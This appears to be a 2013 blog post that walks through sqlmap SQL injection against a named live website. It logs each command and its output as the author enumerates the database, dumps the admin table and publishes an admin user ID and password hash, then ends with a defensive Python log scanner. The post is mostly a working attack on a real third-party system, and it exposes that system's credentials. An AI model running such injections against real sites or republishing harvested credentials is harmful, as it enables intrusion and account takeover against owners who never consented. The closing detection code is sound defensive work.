sqlmap example: injecting MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

    D:\Python27\sqlmap>
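From the defender's side, the four payload shapes sqlmap reports in the session above (boolean `AND n=n`, error-based `FLOOR(RAND(0)*2) ... GROUP BY`, `UNION ALL SELECT NULL`, and `SLEEP(n)`) are easy to spot in a web server's access log once the query string is URL-decoded. The Python below is an added example, not part of the original post; the Apache log lines, client IPs and response sizes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One rule per injection technique sqlmap reported in the session above.
# Each regex is applied to the URL-decoded query-string values of a request.
RULES = {
    "boolean-blind": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),              # AND 799=799
    "error-based":   re.compile(r"floor\(rand\(0\)\*2\).*group\s+by", re.I),  # FLOOR(RAND(0)*2) ... GROUP BY
    "union":         re.compile(r"union\s+all\s+select\s+null", re.I),        # UNION ALL SELECT NULL, ...
    "time-based":    re.compile(r"\bsleep\(\s*\d+\s*\)", re.I),               # SLEEP(5)
}

# Constructed Apache combined-format lines (IPs and sizes invented); the request paths
# carry the same payload shapes as the session above, URL-encoded as sent on the wire.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
10.0.0.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312 "-" "sqlmap/0.9"
10.0.0.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 4870 "-" "sqlmap/0.9"
10.0.0.5 - - [04/Apr/2013:16:53:57 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
10.0.0.9 - - [04/Apr/2013:17:01:00 +0800] "GET /article.php?id=277 HTTP/1.1" 200 5133 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_request(path):
    """Return the sorted technique labels whose pattern matches any decoded query value."""
    query = urlsplit(path).query
    values = " ".join(v for _, v in parse_qsl(query, keep_blank_values=True))  # parse_qsl URL-decodes
    return sorted(label for label, rx in RULES.items() if rx.search(values))

def scan_log(text):
    """Return (line_no, client_ip, labels) for every request matching at least one rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        labels = classify_request(m.group(1))
        if labels:
            hits.append((n, line.split()[0], labels))
    return hits

if __name__ == "__main__":
    for n, ip, labels in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {', '.join(labels)}")
```

The unmodified requests for id=276 and id=277 produce no hits; the four probe requests are each tagged with the technique they belong to, and all come from one client, which is the pattern to alert on.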